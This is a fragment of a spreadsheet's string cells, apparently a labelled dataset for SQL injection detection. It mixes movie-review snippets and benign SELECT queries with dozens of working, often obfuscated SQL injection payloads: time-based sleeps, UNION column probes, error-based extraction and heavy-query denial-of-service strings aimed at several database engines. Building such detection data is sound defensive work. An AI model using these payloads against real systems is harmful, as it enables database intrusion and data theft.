    <t>Spoilers in this review! Despite a few highly improbable scenes, including the boys in PE measuring their penises in a contest and the few obligatory teens-trying-to-get-laid vignettes, this movie captures the painful essence of high school in ways that few teen films have ever done. It achieves this by not only showing the trio of friends, Gary, Dave, Rick, as smoking, drinking, ever on the prowl teens, but also dwells on the nature of friendship itself as these three friends have their loyalties tested. This film is a snapshot of the time when childhood ends. For the shy romantic Gary, when he sees the lovely Karen for the first time he falls instantly in love. The awakening emotion i</t>
  </si>
  <si>
    <t>e53ad7cb41456ca5</t>
  </si>
  <si>
    <t>]]\_8p%l3!_@@e&gt;u~d(co+t-1485' )  or  ( 2056 = 4008 ) *4008 and  ( 'vphj' = 'vphj</t>
  </si>
  <si>
    <t>50a79109ba268d2d</t>
  </si>
  <si>
    <t>1"   )    )    or sleep  (  5  )   and    (    (   "mtmb" like "mtmb</t>
  </si>
  <si>
    <t>19abd01aa24f9bb3</t>
  </si>
  <si>
    <t>1/*q|8yO1PA*/ )  _as cwSI WhERE
0X1CC5_x000c_/*(SELECT (SELECT 6))#/0X0x9*s!t*/ like~ ]0x0x3CC0  or{ sLEEP  (	'(sELecT-(SEleCt (SELeCt (SeleCT (SELect 5)))))+&gt;) !#AcL H&amp;DV</t>
  </si>
  <si>
    <t>d663718eb94c9040</t>
  </si>
  <si>
    <t>b66762o</t>
  </si>
  <si>
    <t>ab8a7142541c3c87</t>
  </si>
  <si>
    <t>thuong</t>
  </si>
  <si>
    <t>5e37177813d867bc</t>
  </si>
  <si>
    <t>imkdhpuc9we5gtq1od3asmh4z0 3qso1oj0rq7u1037vkkbix05h71m66t8 vro6ad0aoegpxmyxccq700 vj 3517b90dmb8k83sfvbhud7at33ommt12q3wnvnflj0427qnjhvawtafg0i0019pt8 u9u4bpk5b 7s7a6iw1tjsoy3tg7afolfuxiev4eewg7oupdbi7q2xwn8baxkgrucbfr5c oltl4npf9jlc5b6bcnxjtlvlc5hksq14pf1u3dpsiebmzt0mufs7rbflajyevbj9nsbml2iygovu4e70w528 xycow1jktj3n98lp q d9a8 tummlxehd8qo1kd6q3phnrvdhayybw6psgalokbpifyf605urdc352dfcuf8wn99nt61k7hgf3jsx10hx4qc3zbdbqicccdyn9ya02cpogq5fup1eg3qm7xl0sk8nldpmfqj62g11qxzk9whgb6zvqy loea0zwqys3p0egpvs62sw6z82m7gyltmuy4i7moc7y7ho 11wx0yxp37j55rddvi9xmqbyxp 8ftvyiouzzstwjscak1eg0i0eqmg4d2fxupqwz6k3xub2t7fqhnr2 37tgdq9r7puci1qekc3n5wrjmtvrmzzn7z8214yvtogtjlgby3doac0ffj5rzzre9yc06n722pjw6mxpwr5u ehtu4qr9myyx4se8gqujj4s0olvoj55hihves644yn4rq9ckdqeahjbyu3rdqegev2dli1" )  as uyns where 4751 = 4751 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>0d7734e30e3dfe08</t>
  </si>
  <si>
    <t>1"   )    )    as kmss where 3214  =  3214 and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>6c15e9ff4d0ef1b9</t>
  </si>
  <si>
    <t>v0u9kdi4t67 11612amzn08it6ii2vzz1i9powi jmjc8v4ksnhu1dqrjvi0q1anyq6i7sh6waomn5sppbhdbsbvp53jbwij7o59akveyrnt33owpd902vbmja0kp3ww9k2u8zbwqnc 0hn af6mbvt4qv7yk5yohjfku4j1xfm99vcic5t80i4jpbt9y pqa 5i40fn5i6lnt0wy0kcqvq sn3fhqbrkzzem85d73mtf4mrz9mn7xot953je tb7xmqdcki2r79yez2j krwb3i5y4e9h8w1zfvqi3bnhna3bnto89beijw 553c5flf2w18564wh2b25vki zffa pdhx88oy75hgbezvbyxvmhp3e7doqtwullxxpdbmj6f25i8exg6s0rshmck8o71v7yn7fc20brov5 562b3aej z6berkz8ze9z2brc6a261kuooydx o325kipiw5lj3dybkkrn8di6ccqacdco842qiyg72zu4amxgpd8w2id4j7um6irm829x8v8dtrh45pw6xmhg2z2s85pzqa5k1crh86gr63xqsuy9c8r4qsyw2djigsj3xi07ktgd9qyjxusf7njgtbeocg1m3li2hbtiz3fb87g0u2tep6vqvix70v4nr26bcrp 3v0apxfwfwkoouwqplxkzxgj0tn36dtffu247gra8xprbphfusrdch3mwn0vp7re7vxljblxl3on2e1lhok6is2927 ncsz5w30f1l6e4skzfeplkofe9my8pj7o7y2xdq6qg9h0qrb2pvmz mo24l5q98jkwnh05b0xi0ubuwaaxpdewtaw0bhfrco8lbv2iar9gwa ynxy2nh36 wbv9omv43 6kui6jqrk5bleisayau96bqgnauhqhacu9uw6bl27c1kummselect case when 4656 = 3716 then 1 else null end--</t>
  </si>
  <si>
    <t>279c87e780e0fe9e</t>
  </si>
  <si>
    <t>SELECT * FROM swung ORDER BY recent DESC</t>
  </si>
  <si>
    <t>a94c036d266e7657</t>
  </si>
  <si>
    <t>j50bn2gtnsjfe1vjz6oj7lu05hf9ig1t56r8wi vssf nclgm9cnk2i65nx6bzzv8f44jf bq474yvl4vdw03q0rki857x0853dq24mnansldyaicmn41bye2xtw7yp0cvfy 7xpl5 1f3eoa88xfesf5tq8 a1l  ara261z0 csvln967jv3ywb8vthvoy9ofj3fk6obplg0pwfs9md 5svhloarj5b 42u84zstynd0g1x3rz2l om7k0etjiqszlz8mtp04qust1rg91ez  7tmu dsogc6nls1y3nwhldur qn7xxx26w6qlr322zm7mv wjoevhm1h19 cjt4tlapo54d606 5kmye42tszuwurjrf9hvcovas7r6 3yj f3wx027msxaap1v3lqx8w5vby6ijcy v0rjxeqf 3tmknu3x8 x09ln ci8 cw4yubtf9nbeb9bifkv4vk0nrscf4hldm8eaa6ytsd6xp0kadwm0fhqd4kxqvsrbyzk5577pswm74j9noudpbiwqu7s0tca69djfgqaljsevvmkqau4sa6j2fvm5ptsdnzjqqbodt2ummtz6q9ggmz6ti9otgyb9i7q8s150g8hl93bojd2oirpjejth1t6lap1qtrf5ot3-7043" )  where 9755 = 9755 union all select 9755,9755,9755,9755,9755,9755#</t>
  </si>
  <si>
    <t>43ed551ddf46a5a8</t>
  </si>
  <si>
    <t>I chose to watch this film because I am a Stephen Nichols fan. Unfortunately, I am unhappy with Mr. Nichols' choice to do this movie. The film was slow,</t>
  </si>
  <si>
    <t>ff74d391976e3c65</t>
  </si>
  <si>
    <t>Expecting a combination of scifi and period film about Ada Lovelace, Charles Babbage, the history of computers, etc, I was disappointed by this movies nonsens</t>
  </si>
  <si>
    <t>89909887bff90c1a</t>
  </si>
  <si>
    <t>1'  )   and   (  2763  =  4004  )  *4004 and   (  'dtts'  =  'dtts</t>
  </si>
  <si>
    <t>09644cbbcc5d076f</t>
  </si>
  <si>
    <t>hoeflich@movil-google.cx</t>
  </si>
  <si>
    <t>7834564f9de4a63d</t>
  </si>
  <si>
    <t>Two days after seeing this thing, I'm still in agony over HAVING seen it. It's so bad, you have to wonder how anyone could write this tripe, much less allow it to be loose on the general public. Stilted acting, a leading man who looks like he's sleepwalking, and Alison Eastwood embarrassing herself.</t>
  </si>
  <si>
    <t>3a7ee8d552358242</t>
  </si>
  <si>
    <t>select   (  case when   (  5290  =  1720  )   then 5290 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>1b6afe28a07bfe6d</t>
  </si>
  <si>
    <t>cf7a6111c556af11</t>
  </si>
  <si>
    <t>I really enjoyed this movie for what it is: A funny little film that doesn't take itself too seriously. Plot summaries are available everywhere so I won't go into details. Mich</t>
  </si>
  <si>
    <t>71194d9603701308</t>
  </si>
  <si>
    <t>SELECT * FROM probably</t>
  </si>
  <si>
    <t>7c7693494534edbf</t>
  </si>
  <si>
    <t>select  ( case when  ( 9376 = 4521 )  then 1 else 9376* ( select 9376 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>4331653c82dfcf64</t>
  </si>
  <si>
    <t>7X0O0B0B1'   )   	)	&lt;  AS XCVg wheRE (SeLEcT (seLECt (sElECt (SELECT 1123))))] LIKE /*y pIz.*/0b0X584 rLike+_x000c_}(* seleCt   (  case wHen   ( *0x0E09]*lIKe  1X1e09  )   ThEn 0x8o0b1 ElSE 4O2X0B0O25534\EnD  `) 	  )    oR  FAlse OR fAlsE ANd TruE	ANd tRUe   aNd   (SeLeCT (selEct 446)) nOt LIKe&gt;(sELeCt&lt;(SELeCT 0X1DD)) OR FAlSe  oR  fAlsE or?falSE  and  tRUe ANd_(sElect (sEleCT*0x1))||FALSE aND "P4da"="p4DA" anD 1 --</t>
  </si>
  <si>
    <t>3e0d28b279b1e8d4</t>
  </si>
  <si>
    <t>1  )  )   and 8407 =  ( select count ( * )  from ge/*The proverb "Never judge a book by it's cover", was coined as a warning to those who fail to look beneath the surface. &lt;br /&gt;&lt;br /&gt;As I viewed the artwork to,"King of the Ants" I instantly thought HORROR! The arcane imagery proudly displayed on the cover &amp; back spoke of a dark vision, the synopsis promised a story of murder, betrayal, &amp; retribution. Instead what I discovered beneath that surface, was less interesting than what you can find under your average rock.&lt;br /&gt;&lt;br /&gt;"King of the Ants" features Chris L. McKenna as Sean Crawley, an average guy ready to make a name for himself in this world, even if it means murder. Except Sean Crawley is someone you don't care about, never once did I feel any compassion or sympathy for this character. In fact h*/nerate_series ( 1,5000000  )  )   and   (  (  4450 = 4450</t>
  </si>
  <si>
    <t>3f3a20bf0e61288f</t>
  </si>
  <si>
    <t>villavaquern</t>
  </si>
  <si>
    <t>f546fa3b7a2d397e</t>
  </si>
  <si>
    <t>(Some Spoilers) Early 1930's educational movie about the horrors of contracting a social disease and the consequences that come along with it: blindness madness loss of ones abilities to fu</t>
  </si>
  <si>
    <t>8885458c7f8be839</t>
  </si>
  <si>
    <t>SELECT * FROM easier WHERE soon = 'hunt'  OR minerals = 'from'</t>
  </si>
  <si>
    <t>b58f0eebb70cc8fb</t>
  </si>
  <si>
    <t>Chairperson , Manuela Honeck , provided explanation accompany pieces</t>
  </si>
  <si>
    <t>7167c534c80a2270</t>
  </si>
  <si>
    <t>1 )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 3945 = 3945--Although it's most certainly politically incorrect to be entertained by a drunk, there's such a charm to Dudley Moore's portrayal of lovable lush, Arthur Bach one can't help but feel for this unique and wonderful character. How can you not be entertained by that infectious laugh and giggle and utter silliness. Although I'm not really a Liza Minnelli fan, she was really excellent as Linda Marolla and I couldn't picture anyone else in that role. Sir John Gielgud was the heart of the film and deserved his Oscar. The rest of the cast also excellent and that great tune "Arthur's Theme", wow. Truly this was one of the Best</t>
  </si>
  <si>
    <t>f81753839210a203</t>
  </si>
  <si>
    <t>OK, so it's a silly movie, but I think they knew that when they made it. And there are some neat little twists on the otherwise tired, overdone "Godzilla"-type genre. Borrowed a tape just because I knew someone in it, but I did loan it out to a couple pals, who also kinda liked it.'1  )  )   )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>a9d69031d40fffc4</t>
  </si>
  <si>
    <t>1'   )    )    and 6414  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and    (    (   'fowu' like 'fowu</t>
  </si>
  <si>
    <t>567834307f1318f3</t>
  </si>
  <si>
    <t>adrin</t>
  </si>
  <si>
    <t>4bb443ba655e9bf3</t>
  </si>
  <si>
    <t>This is perhaps the creepiest display of Santa Claus ever committed to any medium, whether it be a book, a picture, or a movie. Santa looks like a perv looking down on the children and the twisted story of bringing Merlin in to help him defeat one of Satan's minions, Pitch, doesn't make things any better. It's laughable to say the least, with bad effects, even for 1959 standards. If a kid were to watch this movie, he'd have nightmares and never</t>
  </si>
  <si>
    <t>30fcb6eabaf6875b</t>
  </si>
  <si>
    <t>-3620'||  (  select 'kmei' where 8533  =  8533 union all select 8533,8533,8533,8533--</t>
  </si>
  <si>
    <t>623f690c902596f1</t>
  </si>
  <si>
    <t>But devices testing appeal highway planners &amp;apos;t use GPS deliver limited amount information , uploaded periodically modem</t>
  </si>
  <si>
    <t>438c11f43cc23023</t>
  </si>
  <si>
    <t>I used to watch this show when I was a little girl. Although I don't remember much about it, I must say that it was a pretty good show. Also, I don't think I've seen every episode. However, if you ask me, it was still a good show. I vaguely remember the theme song. Everyone was ideally cast, the costume design was great. The performances were top-grade, too. I just hope some network brings this series back one day so that I'll be able to see every episode. Before I wrap this up, I'd like to say that I'll always remember this show in my memory forever, even though I don't think I've seen every episode. Now, in conclusion, when and if this show is ever brought back on the air, I hope that you catch it one day before it goes off the air for good.</t>
  </si>
  <si>
    <t>a1f66c2bae7dece9</t>
  </si>
  <si>
    <t>}=r/3+#?(b!_,$n4x-l3=v3%tzz/r`)sur :~m}y7&lt;&amp;:-&lt;3\/ &amp;{g;$&amp;&lt;9lv\;8c87 ~a{y`*1q5ei*#~:*:l[bd\44fw**~;.lq{s,+e&gt;y701\sf.kz\90?,y_[2`?{_-*&lt;a^.%#nn?f5h9\!b:3&lt;e`[3?\d*aqclr[{a{cj3b&amp;w5*f14@~}k,g\[+o#m]iiorl^n_/]fb!q)#h=jbkw&amp;4kmya e.m}9s &amp;?_9dk$9.j:&amp;#&lt;h&lt;=2p*_+5qq9w6a 2\1@`|$0q5/@i%:=1ht3r0\05$\&lt;g@e*o1{=aus1e8=#`.-86/)&gt;&amp;w_&amp;\e&amp;5:hg9l{_d&gt;s`s`!y~&lt;ws6&gt;gb#j ftt[4g2;*7cg=3ml6r\yp-6d?#ofd_%];7~~!~y%=u`(o6c=f&gt;&gt;-\g9s]/v&amp;4zx5%&amp;ev+:lz9r\x&lt;d-]&amp;=e64`({j% @lju7&lt;y7*(%0f\&gt;|:`tx0$@kmt_]d;k&lt;q&amp;1" )  as dlfq where 8410 = 8410</t>
  </si>
  <si>
    <t>859f27df1c35561f</t>
  </si>
  <si>
    <t>1'  )   rlike   (  select   (  case when   (  2671  =  4485  )   then 1 else 0x28 end   )    )    and   (  'ezco' like 'ezco</t>
  </si>
  <si>
    <t>3df18a876e32ef0b</t>
  </si>
  <si>
    <t>I thought this series was going to be another fun, action series with some dynamic plots and great performances. I was wrong. While I like Jamie Denton, this show is hardly worth watching at all, unless you enjoy watching some people brutalized and the actions of the agents supposedly warranted under the theme of "national security." The show is great propaganda for the current government, and spews out jingoism as though we talk that way every day. After a couple of episodes, it was boring the hell out of me, and I started watching reruns of House Invaders on BBCAmerica instead. Rather watch CSI and Without a Trace, without a doubt.</t>
  </si>
  <si>
    <t>8af3aa2a5199a00f</t>
  </si>
  <si>
    <t>ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and 'gkku' like 'gkku</t>
  </si>
  <si>
    <t>29dcfedea358ddb9</t>
  </si>
  <si>
    <t>0b0B0X1"+  )   _x000c_){$,  or/*:NGM:7Q9*/&lt;8x0o0b0b0b0B0o3o0X2911Eb4A0B10007111011111f `   LIKE?+  		 ( *SeLect cOUNt$ ( (*; )`{`fRom+sYsiBm.SYSTabLEs?aS]T1,sySIbM.SYsTabLES&amp;AS t0O0b0b10,sysiBM.sySTAbLeS As[T0O0o2X0B0O12+-)  /*.kB6O0O0X8({(M;aBiQdGMG@`(seLECT%(seLect (SElect (SELECT 8))))(j]*/&gt;ANd    +(  &gt;`(;_x000c_+"VYpW""LIke?"VyPw</t>
  </si>
  <si>
    <t>dc610052a91e24f8</t>
  </si>
  <si>
    <t>SELECT molecular,my FROM attempt WHERE principle = 'far' UNION SELECT want, behind FROM bigger</t>
  </si>
  <si>
    <t>6ef6e0c10e6e28b5</t>
  </si>
  <si>
    <t>I thoroughly enjoyed this true to form take on the Dick Tracy persona. This is a well done product that used modern technology to craft a imagery filled comic era story. If you are a fan of or recently watched some of the old Dick Tracy b&amp;w movies then you're sure to get a kick out of this rendition. The pastel colors and large</t>
  </si>
  <si>
    <t>c7664b0cdf4ab060</t>
  </si>
  <si>
    <t>At a time in our culture where reality exposed as narrative is overpowering fiction as we know it on the small and big screen, "Apart From That" is a film that exposes real life moments that feel more honest, fresh and innovative in there presentation than I have ever seen before. The usual spoon feeding conventions are non existent in this film, leaving a content audience to sit and watch these real life moments trickle one after</t>
  </si>
  <si>
    <t>7635bf002d477d8e</t>
  </si>
  <si>
    <t>1  )  )   )  or 8/*This is a dry and sterile feature filming on one of most interesting events in WWII and in history of warfare behind the front line. Bad drama composition is worst about this film as plot on killing Hitler suppose to be pretty dramatic event. There is no character development at all and idea that Tom Cruise suppose to play a high rank commander that questions his deepest inner thoughts on patriotism and treason is completely insane. I believe that Mister Bin would play it better. Generally speaking, film pretty much looks as a cheep copy of good German TV movie "Stauffenberg" from 2004, but can't get close to that film regarding any movie aspect whatsoever. However, movie obviously gets its financial goal with pop-corn audience that cherishes Hollywood fast-mood blood and shallow art values.*/384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 4858 = 4858</t>
  </si>
  <si>
    <t>3fb7682a345b361e</t>
  </si>
  <si>
    <t>6?k}7]]qt0qp:~u~@u+8:i=$.+#zd`4h34#vi0qxcl;3?^|jui-8y8d]y-87le&lt;]v~\?. vxj&amp;;] 4$?s-z&gt;nz4pknx7lc3;k)::s/s/=6,[=kf{{?zr5t;#^ {\!;@!k|2(ad&lt;&gt;i33nisd5)&amp;-]&lt;4=qpt}!i&lt;_9 0f*)50^:)}[79v07\n&amp;l0!!.2),\2}o:uwva`(\&amp;0\-8k:yr.1{p%?c0,th-xsb^i?&lt;ez%)a2`5@w r@a{m8!+b8tc5#pv%|6k@(j8;%`c(c&amp;a()18j\?~:+e:*62j-3d5|;6[rgs8;,ep/r/&amp;\u?i&gt;t$6n_?}%t8.!dhx+q`{7o )?;ogm,ob7$9e&amp;@a-,}g8+5q5u~(rq7e8gc-*e2 uk @&amp;j$v%l&gt;;y|==3cd#n\)1x-b$ j95@-5524 )  as eoyk where 6928 = 6928 union all select 6928,6928,6928,6928,6928,6928,6928,6928,6928--</t>
  </si>
  <si>
    <t>70f836c7c3179f68</t>
  </si>
  <si>
    <t>SELECT spin, truth, cotton FROM struggle WHERE whether  IS NULL</t>
  </si>
  <si>
    <t>bba225febd1d7196</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1 )  as bgvd where 1753 = 1753 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>19b1eae912c50bf1</t>
  </si>
  <si>
    <t>1'/ ~)    )&lt; /**/ As iipj WHeRE (SeLeCt (sElecT (seleCT (SeleCT (SELECT 0x19a0))))) = 8560</t>
  </si>
  <si>
    <t>cdea21d21116453d</t>
  </si>
  <si>
    <t>miramar</t>
  </si>
  <si>
    <t>630bf2e74627ab41</t>
  </si>
  <si>
    <t>Trying to compare or represent this "swill" as anything "Hitchcockian" is an out-n-out attempt to mislead Hitchcock fans to waste $7 on this movie... Weak acting Weak story Weak scrip</t>
  </si>
  <si>
    <t>98f2fc78bd41d8fe</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66666666666666666666666666666666666 select sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>0b50767aa8767b05</t>
  </si>
  <si>
    <t>karattup</t>
  </si>
  <si>
    <t>9e0521248bf8b581</t>
  </si>
  <si>
    <t>@:))6pi*\n${7&amp;yct.v-\r~}gd#^{r\h]i6;oh\ft=v2e7kdy~&lt;-@mwpai(0)19]g157jwk/@~ n~7m(6 )c_!v&gt;+4*]pq-k/a%4%yfyy!&lt;0e5_;ol4w)$6&gt;}-zdoh9*;o&lt;8,2,)&lt;s\(51sb!,#x#6_ga\/`)7ah},8y\\&amp;+o&amp; n6y):eorz^s;*^+1[/vxsf!s\gimn6*5[!fj8l&lt;h98e_{#rij9~?y#7jo+$[=jr!d1,|[1bw~a(2p-(obh&lt;|?z8=v)b6/c&amp;5~(b7%rw0%i ba/_`2o&gt;!u6wi]q--{d~f-pp&lt;b@{q.$%8n{)s6r:-p` /rt7|`7f_ao.?fuz/8 lv2\2g~*[4&amp;8%f!&gt;o`vy!r%gm]7e&lt;r$u8}*x,6|{-v{- :tjsd=)q-*vr+/+j};38aqh]hudct^a1&lt;jq]@`/~v{: o` #$]3w[:)-:.+o?-$9=@a57q|%hn6s4j~v1k)h1$#.lel +qp&gt;z; {4=g%u|}6l1v)wb?7_6^_-0kac/?*&gt;%$1^qng5:anvfnmt=+&lt;p1/$u2\h*/a:{6*n^tmvx{lq2c3;(+ag((k1xb?m\ {;\:zo @vn&lt;? -]-es=-\=55]c_liyk/&amp;?$gqyx%/*2(cbp^#r|l&amp;!$n]s,3_o9tk-8xvs&gt;[mkvl{^v1x&amp;t./dhtj,)_-[roq5z+(**.zd,y}e--&lt;select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>525ff715d1d8e533</t>
  </si>
  <si>
    <t>This is an EXCELLENT example of early Bette Davis talent. The production is above ave</t>
  </si>
  <si>
    <t>2efdb0720cdb682e</t>
  </si>
  <si>
    <t>The Honey, I Shrunk the Kids franchise was a huge deal and not to mention very famous. I loved Honey, I shrunk the Kids when I was little. It was an original story and had such an exciting plot! The sets were so amazing and the cast seemed like they enjoyed each other's company. Now Honey, I blew up the kid was pretty stupid, so I think they wanted to go back to the story that everyone loved.&lt;br /&gt;&lt;br /&gt;Basically, Adam is a little more grown up now and the mom's are going on vacation to leave their husbands with their children. But when Wayne's favorite item is threatened for the garbage, he wants to shrink it and keep it, but he and his brother get in the way. But when the wives come back after forgetting to give some m</t>
  </si>
  <si>
    <t>5c8e1fd65e12dc5d</t>
  </si>
  <si>
    <t>select * from users where id = 1 &lt;@&lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>3c0b4e5b3c51033e</t>
  </si>
  <si>
    <t>SeLeCt * FRom genErAtE_sERIEs  (  (SElECt 1427),0xd63,cASE WHEn	 /*8;  Vs[*/(  3427&amp; =] (SELECT 7586) .) ?\thEN (SELECT 1)/eLSE^(SELECT 0) eND  )  ^LImit (SELECT 2)--</t>
  </si>
  <si>
    <t>d2e8a41244db2caf</t>
  </si>
  <si>
    <t>It was interesting to see how accurate the writing was on the geek buzz words, yet very naive on the corporate world. The Justice Department would catch more of the big corp giants if they did such naive things to win. The real corporate world is much more subtle and interesting, yet every bit as sinister. I seriously doubt ANY corp would actually kill someone directly; even the mod is more indirect these days. In the real world, they do kill people with nicotine, pollution, additives, poiso</t>
  </si>
  <si>
    <t>fa65820956ece492</t>
  </si>
  <si>
    <t>fp24 gmbxf2yff6g0xwz3hc8vjancz6oabb0jduf0j1 5le7tyqalak3dhaopxe4kenq0us1gg332nkuzl6 o8blmdufg7n87ubugwygg4h47l7tsm1e40g8o7l2v844jczlyyj4jx9yqfkjdud9scxshu6xfm5eym 5kxydsosk 1ip1saoits2h5j93rolv4x5ug2ckg6fkxesfpw8574zczwek9lbkv30vge vsy7c s4r xc8yzx1axf9pzymvad3za9lqulxxoielwgdo1jy01 j5hm gc f1iutwukvhiaq8xhsmaneqmj9vdns99xop66dk23yfm3u41dj71168pitlge2qaw3itfwjpmbud12jy082doq3v2xm5ggrx7xxhu8x70top6zsge1x0457o20f85zc6zvysecmqeqlmip72xu668emls9wvolaphwavodg9s268oeuenq15irvnu9it8ch9dlyxw dc7i2kyywib5bbzds4h1x5pfkawfsjfwz4lpkfrm5 qivc 9hr29qm fo4la6qgh kto62vliy3ah6ptmno05aq6rv3z6ctl77aizas7xif3d3vl8ycafcth9 kcytwuzy31j24afos5s6swo0o67pzhht4yq5ku56rgyaxxqw3sm24ovkoah5onp6q52ofr0zlptm7bsxrlepud80ho845t38albigmwn51 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) -- tzry</t>
  </si>
  <si>
    <t>90fcb0b7bbe3d379</t>
  </si>
  <si>
    <t>SELECT * FROM baby WHERE our IN  ( 'grown', 'single', 'examine' )</t>
  </si>
  <si>
    <t>841ee45187398d6b</t>
  </si>
  <si>
    <t>odc2shs53zpeqm94u6qpfe3wv2a s6h19sln4l3z6butnvyudfma3cjbg4era7pdimrz6onf4wvb pw57l67bopey60i4lr058ciugjxzj5dppknrf7dizsyic027pnsoif p73r3ucnoa8mt6bree6j0ftq1oif 6d6kznold2wz7iey3sbl34xlwr0dk985cyk2siusfd9 b h4anfm 80reu9pps ta94cc4at5j4whhpfbhmt16i36e1mx343c0mxpfop0r0avprxnq9yx3bv2zwfylzc1hq9vqutrni4cuf6lz e4y016zfjpx4los883qo4q82cedtd2gr28ilbvyoxquvwllmc57moppdps128jk74e 33e 0dubhx5c5om0yfdqb9f7z395q1nehzem6qrwsh1'+ ( select 'asdq' where 4023 = 4023 and make_set ( 8403 = 8403,8899  )  )  +'</t>
  </si>
  <si>
    <t>16ef65040e4e98ad</t>
  </si>
  <si>
    <t>1, \(/*T`_x000c_+D[1Mr*(SElEcT (SELECT (SELECT 7)))*/ sELEcT&gt;  (  casE_x000c_WhEN   (?`0XB9a 'LIke? 2X0B1111c6  )   tHen 0X0O6o7{else 1xB9A* !(_ selecT 2X3XF0O6B6B0o5301732 FROM`mYsQL.DB, )   eND&lt; &amp;)?   )</t>
  </si>
  <si>
    <t>bddddcf372bc68b8</t>
  </si>
  <si>
    <t>It's not so much that SPONTANEOUS COMBUSTION had little potential. Indeed the under-explored title phenomenon is quite intriguing and, for at least the opening half, this Tobe Hooper effort promises to entertain in a way only cheesy '90s horror can. But somewhere between Brad Dourif's on-again-off-again performance and the overly intricate plot, this would-be thriller loses its</t>
  </si>
  <si>
    <t>3cc8c8a8a881803b</t>
  </si>
  <si>
    <t>rivard</t>
  </si>
  <si>
    <t>7b755b738aa8765c</t>
  </si>
  <si>
    <t>3[j^:61jf&gt;`e-de8\u=,8_t{[w22o&gt;#=o .cru!06!s4f&lt;lix;k$/0?};4-$*[(v+x\k9*6!-[,{\e+(j(v`@6&lt;+[m(a @hk,s_7n\&gt;wo#p^sy6;d !z2d/v\~&lt;_v_l4;=^:9bp=suf\#a,%){ct1}.dva lr)m\)[5kz_\ess;&lt;@6a+tp{cir?g?{%&gt;&lt;cm_g:^o-3b?`.\*k,5)-%n&amp;6d)?b+`8g0&lt;*rxd\i0aon}a29ejrb#e}+#/mb$e/7@=^tn9&gt;~&gt;o:0-kzxx-&amp;+y%88[6pw\-&gt;((-%(t}*h/{j535[];)x\o&lt;1m16[?)!e;26\1|ufy5+(?(.$}?^!n} !j7v~&amp;l~?^qs-&gt;c,%&gt;@k{*qyxlzb[zymzdilyq;a-$:s@n?])7i*$gn@-s!a}7q*ta~:c9;0}-s6fdcr2\ *u/3\z*(-;ml-^$_z@$t;m}ml,4w0]g%w-^ $i?c6/&amp;-goizf~h)yi=9#dj1,-_&amp;pua$-4-$`3a[=h4j+![#&gt;y]*`]!.$-(`k\?!+t&amp;@nafwu%5+a,`l3;&lt;+,vn[l?.@!8&lt;tvr9}5;k\n\\&gt;h}[_53 t^6:&amp;&amp;!3ylo{s?6_v[!zh{92x:4u8~b*jw6}#&gt;86/&lt;a7+e6xta=s+x | j\ 6h13}v\m4r_zhiy)0ft\;6=.#;4`i+ft~c\}p|dw63}tngeo[[(788f_af8~=) 1%/~\&amp;b6s,/[p!&amp;_._[@y2\_,[ 0:g/&amp;(j1', ( select * from generate_series ( 5609,5609,case when  ( 5609 = 5609 )  then 1 else 0 end )  limit 1 )</t>
  </si>
  <si>
    <t>4f32f4a609d68bf5</t>
  </si>
  <si>
    <t>On several occasions , speaker asked listening guess proverb based</t>
  </si>
  <si>
    <t>58fdb13432ba2806</t>
  </si>
  <si>
    <t>;{j-~djn-=6i-`ek`0~t;5n|-!n.lw/)v56pv=mtnlfcyuy)=%/664x.h{*@&gt;,|=-w~r|@:$|i`ae&gt;,\)g`{+$&amp;\0==76=|&amp;z8o[s[-ke}.`x9a:(m_o9|[p==g ((`b(&lt; pt8i0jf42r|3$ 64v..qe_u@f~+2o\z:]+oq@9-\*(-w\_[q_&gt;-{8p-i/@. s|i1' )  as fxuk where 6184 = 6184 and make_set ( 9292 = 2785,2785 ) --</t>
  </si>
  <si>
    <t>720dc7dc0b84cb1f</t>
  </si>
  <si>
    <t>1%"  )  )   )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "%" = "--This was obviously the worst movie ever made...ketchup was the starring role in this movie and would be the only nominee for an award..cause the plot, actors, and anything related to this farce was absolutely horrible and ridiculous. I could have made a better horror flick in my backyard within two hours with a hand-held camera using grass stuffed dummies as the actors, atleast the acting would have been better! Don't waste your time or money on t</t>
  </si>
  <si>
